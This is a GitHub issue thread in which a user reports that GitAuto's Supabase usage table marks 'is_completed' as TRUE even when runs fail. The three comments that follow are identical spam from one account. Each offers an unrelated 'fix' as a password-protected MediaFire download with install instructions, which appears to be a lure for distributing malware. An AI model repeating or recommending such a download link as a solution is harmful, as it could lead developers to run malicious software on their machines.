### ISSUE TITLE
Bug: `is_completed` in usage table in Supabase always `TRUE` even if GitAuto failed to complete

### ISSUE THREAD

**Issue by hiroshinishio** [gitautoai/gitauto#285]
### Bug Behavior

`is_completed` in usage table in Supabase always `TRUE` even if GitAuto failed to complete

### Logs

N/A

### When It Occurred

Now

### Steps to Reproduce

1. Everytime GitAuto fails, it happens

### Expected Behavior

Only when GitAuto completed the whole process, it should be TRUE

### Device

N/A

### OS

macOS

### Browser

Chrome

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
